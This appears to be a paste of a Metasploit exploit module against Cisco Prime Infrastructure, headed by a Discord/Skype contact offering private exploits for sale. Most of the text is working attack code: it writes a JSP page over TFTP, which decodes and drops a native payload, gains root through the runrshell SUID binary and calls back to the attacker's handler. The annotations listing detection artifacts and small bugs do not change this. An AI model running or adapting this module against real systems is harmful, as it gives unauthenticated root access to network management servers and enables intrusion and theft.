
[CISCO PRIME INFRASTRUCTURE LOADER] RCE METASPLOIT

xB4ckdoorREAL Nov 7th, 2018 101 Never
  1. ## DISCORD:  https://discord.gg/QDy3bUy OR SKYPE: b4ckdoor.porn ( for spot/private source or exploit)
  2. # This module requires Metasploit: http://metasploit.com/download
  3. # Current source: https://github.com/rapid7/metasploit-framework
  4. ##
  5.  
# Metasploit exploit module for Cisco Prime Infrastructure (CPI), as pasted.
#
# The chain implemented below is split across four methods:
#   1. +check+                - fingerprints the swimtemp web path from its 404 behaviour.
#   2. +upload_payload+       - writes a JSP file to the target over TFTP (RPORT_TFTP, default 69).
#   3. +generate_jsp_payload+ - builds that JSP: it drops the native payload to a temp file and
#                               runs it through /opt/CSCOlumos/bin/runrshell (the privilege-
#                               escalation step described in 'Description').
#   4. +exploit+              - requests the JSP over HTTP(S) so Tomcat executes it.
#
# Host and network artifacts a defender can look for are noted on each method.
# The uploaded JSP is never removed (see +exploit+), so it remains on disk.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  # HttpClient supplies send_request_cgi/normalize_uri; EXE supplies
  # generate_payload_exe; FileDropper supplies register_files_for_cleanup,
  # which this module includes but leaves commented out in +exploit+.
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  # Registers module metadata and datastore options.
  #
  # @param info [Hash] metadata merged through +update_info+ into the base class.
  # Options registered: RPORT (HTTP/S, default 443), RPORT_TFTP (TFTP write
  # target, default 69), SSL (on by default) and TARGETURI (the swimtemp path,
  # default '/swimtemp').
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Cisco Prime Infrastructure Unauthenticated Remote Code Execution',
      'Description'    => %q{
        Cisco Prime Infrastructure (CPI) contains two basic flaws that when exploited allow
        an unauthenticated attacker to achieve remote code execution. The first flaw is a file
        upload vulnerability that allows the attacker to upload and execute files as the Apache
        Tomcat user; the second is a privilege escalation to root by bypassing execution restrictions
        in a SUID binary.

        This module exploits these vulnerabilities to achieve unauthenticated remote code execution
        as root on the CPI default installation.

        This module has been tested with CPI 3.2.0.0.258 and 3.4.0.0.348. Earlier and later versions
        might also be affected, although 3.4.0.0.348 is the latest at the time of writing.
      },
      'Author'         =>
        [
          'Pedro Ribeiro'        # Vulnerability discovery and Metasploit module
        ],
      'License'        => MSF_LICENSE,
      # NOTE(review): the reference entries and DisclosureDate are unfilled
      # 'TODO' placeholders in this paste; no CVE or advisory is identified here.
      'References'     =>
        [
          [ 'CVE', 'TODO' ],
          [ 'CVE', 'TODO' ],
          [ 'URL', 'TODO' ],
          [ 'URL', 'TODO' ]
        ],
      'Platform'       => 'linux',
      'Arch'           => [ARCH_X86, ARCH_X64],
      'Targets'        =>
        [
          [ 'Cisco Prime Infrastructure', {} ]
        ],
      # Privileged: the payload is expected to run as root after the runrshell step.
      'Privileged'     => true,
      # WfsDelay: how long +handler+ waits for a session (seconds).
      'DefaultOptions' => { 'WfsDelay' => 10 },
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'TODO'
    ))

    register_options(
      [
        OptPort.new('RPORT', [true, 'The target port', 443]),
        OptPort.new('RPORT_TFTP', [true, 'TFTPD port', 69]),
        OptBool.new('SSL', [true, 'Use SSL connection', true]),
        OptString.new('TARGETURI', [ true,  "swimtemp path", '/swimtemp'])
      ])
  end


  # Probes GET <TARGETURI>/swimtemp (so '/swimtemp/swimtemp' with the default
  # option) and reports Detected only for a 404 whose body is empty, which the
  # author observed to be specific to the swimtemp webapp. The check cannot
  # distinguish a patched host from a vulnerable one, so it never returns
  # Vulnerable; any other response, or no response, yields Unknown.
  #
  # @return [Msf::Exploit::CheckCode]
  # Observable: an unauthenticated GET for the swimtemp path in the web access log.
  def check
    res = send_request_cgi({
      'uri'    => normalize_uri(datastore['TARGETURI'], 'swimtemp'),
      'method' => 'GET'
    })
    if res && res.code == 404 && res.body.length == 0
      # at the moment this is the best way to detect
      # a 404 in swimtemp only returns the error code with a body length of 0,
      # while a 404 to another webapp or to the root returns code plus a body with content
      return Exploit::CheckCode::Detected
    else
      return Exploit::CheckCode::Unknown
    end
  end


  # Delivers +payload+ (the JSP text) to the target over TFTP.
  #
  # The content is handed to the Rex TFTP client inline via the "DATA:" prefix
  # rather than read from a local file, and is written on the target under a
  # random 5-18 character alphabetic name with a '.jsp' suffix. +exploit+ later
  # requests that name under TARGETURI, i.e. the TFTP root is assumed to be
  # served by the swimtemp web path.
  #
  # @param payload [String] JSP source produced by +generate_jsp_payload+
  # @return [String] the remote file name that was written
  # Observable: a TFTP write request (WRQ) to RPORT_TFTP carrying a *.jsp name,
  # followed shortly by an HTTP GET for the same name.
  def upload_payload(payload)
    # Local source port: LPORT if the user set one, otherwise a random high port.
    lport = datastore['LPORT'] || (1025 + rand(0xffff-1025))
    # Local bind address for the TFTP client.
    lhost = datastore['LHOST'] || "0.0.0.0"
    remote_file = rand_text_alpha(rand(14) + 5) + '.jsp'

    tftp_client = Rex::Proto::TFTP::Client.new(
      "LocalHost"  => lhost,
      "LocalPort"  => lport,
      "PeerHost"   => rhost,
      "PeerPort"   => datastore['RPORT_TFTP'],
      "LocalFile"  => "DATA:#{payload}",
      "RemoteFile" => remote_file,
      "Mode"       => 'octet',
      "Context"    => {'Msf' => self.framework, 'MsfExploit' => self},
      "Action"     => :upload
    )
    # NOTE(review): this log line reads datastore['TFTP_PORT'], which is not a
    # registered option (the client above uses 'RPORT_TFTP'); only the message is affected.
    print_status "Uploading TFTP payload to #{rhost}:#{datastore['TFTP_PORT']} as '#{remote_file}'"
    tftp_client.send_write_request

    remote_file
  end

  # Builds the JSP page that Tomcat will execute.
  #
  # The page embeds the base64-encoded native payload and, when served, does
  # the following on the target as the Tomcat user: decodes it into a temp
  # file "<prefix>*.bin", writes a wrapper "<prefix>*.sh" that invokes
  # /opt/CSCOlumos/bin/runrshell with the .bin path, runs `chmod 777` on both,
  # executes the wrapper, and after ~200 ms removes both files. Every Java
  # identifier and the "<prefix>" (3-8 alphabetic characters) is randomized
  # per run, so the page text is not a stable signature; the spawned commands are.
  #
  # @return [String] the JSP source collapsed onto a single line
  # Observable: the Tomcat JVM spawning chmod, rm, a *.sh wrapper and runrshell;
  # short-lived <prefix>*.bin / <prefix>*.sh files in the JVM temp directory.
  def generate_jsp_payload
    # Native executable for the selected payload and arch (Msf::Exploit::EXE).
    exe = generate_payload_exe
    base64_exe = Rex::Text.encode_base64(exe)

    # Prefix for the two temp files created by File.createTempFile below.
    native_payload_name = rand_text_alpha(rand(6)+3)

    # Randomized Java identifiers used inside the JSP.
    var_raw     = rand_text_alpha(rand(8) + 3)
    var_ostream = rand_text_alpha(rand(8) + 3)
    var_pstream = rand_text_alpha(rand(8) + 3)
    var_buf     = rand_text_alpha(rand(8) + 3)
    var_decoder = rand_text_alpha(rand(8) + 3)
    var_tmp     = rand_text_alpha(rand(8) + 3)
    var_path    = rand_text_alpha(rand(8) + 3)
    var_tmp2     = rand_text_alpha(rand(8) + 3)
    var_path2    = rand_text_alpha(rand(8) + 3)
    var_proc2   = rand_text_alpha(rand(8) + 3)

    # Java snippet: make the dropped .bin and .sh world-accessible, then pause briefly.
    var_proc1 = Rex::Text.rand_text_alpha(rand(8) + 3)
    chmod = %Q|
    Process #{var_proc1} = Runtime.getRuntime().exec("chmod 777 " + #{var_path} + " " + #{var_path2});
    Thread.sleep(200);
    |

    # Java snippet: pause briefly, then delete both dropped files.
    var_proc3 = Rex::Text.rand_text_alpha(rand(8) + 3)
    cleanup = %Q|
    Thread.sleep(200);
    Process #{var_proc3} = Runtime.getRuntime().exec("rm " + #{var_path} + " " + #{var_path2});
    |

    # The page imports sun.misc.BASE64Decoder, an internal JDK API that was
    # removed in Java 9; it is present on the JDKs the author lists as tested.
    # All exceptions are swallowed by the empty catch block, so a failure leaves
    # no trace in the HTTP response.
    jsp = %Q|
    <%@page import="java.io.*"%>
    <%@page import="sun.misc.BASE64Decoder"%>
    <%
    try {
      String #{var_buf} = "#{base64_exe}";
      BASE64Decoder #{var_decoder} = new BASE64Decoder();
      byte[] #{var_raw} = #{var_decoder}.decodeBuffer(#{var_buf}.toString());

      File #{var_tmp} = File.createTempFile("#{native_payload_name}", ".bin");
      String #{var_path} = #{var_tmp}.getAbsolutePath();

      BufferedOutputStream #{var_ostream} =
        new BufferedOutputStream(new FileOutputStream(#{var_path}));
      #{var_ostream}.write(#{var_raw});
      #{var_ostream}.close();

      File #{var_tmp2} = File.createTempFile("#{native_payload_name}", ".sh");
      String #{var_path2} = #{var_tmp2}.getAbsolutePath();

      PrintWriter #{var_pstream} =
        new PrintWriter(new FileOutputStream(#{var_path2}));
      #{var_pstream}.println("!#/bin/sh");
      #{var_pstream}.println("/opt/CSCOlumos/bin/runrshell '\\" && " + #{var_path} + " #'");
      #{var_pstream}.close();
      #{chmod}

      Process #{var_proc2} = Runtime.getRuntime().exec(#{var_path2});
      #{cleanup}
    } catch (Exception e) {
    }
    %>
    |

    # Collapse the page onto one line. The first gsub already removes every
    # LF, so the CRLF and \x0a passes afterwards cannot match anything.
    jsp = jsp.gsub(/\n/, '')
    jsp = jsp.gsub(/\t/, '')
    jsp = jsp.gsub(/\x0d\x0a/, "")
    jsp = jsp.gsub(/\x0a/, "")

    return jsp
  end


  # Runs the full chain: build the JSP, upload it over TFTP, request it over
  # HTTP(S) so Tomcat compiles and executes it, then hand off to the payload
  # handler. The uploaded JSP is deliberately not registered for cleanup (see
  # the comment below), so it stays on disk under the swimtemp path as a
  # durable artifact of the attempt.
  #
  # @return [void]
  def exploit
    jsp_payload = generate_jsp_payload

    jsp_name = upload_payload(jsp_payload)

    # we land in /opt/CSCOlumos, so we don't know the apache directory
    # as it changes between versions... so leave this commented for now
    # ... and try to find a good way to clean it later
    # register_files_for_cleanup(jsp_name)

    print_status("#{peer} - Executing payload...")
    # GET <TARGETURI>/<random>.jsp triggers execution; the response is discarded,
    # so success is only known from whether a session arrives at the handler.
    send_request_cgi({
      'uri'    => normalize_uri(datastore['TARGETURI'], jsp_name),
      'method' => 'GET'
    })

    # Wait for the payload session (WfsDelay defaults to 10 s via DefaultOptions).
    handler
  end
end
  192. #07/11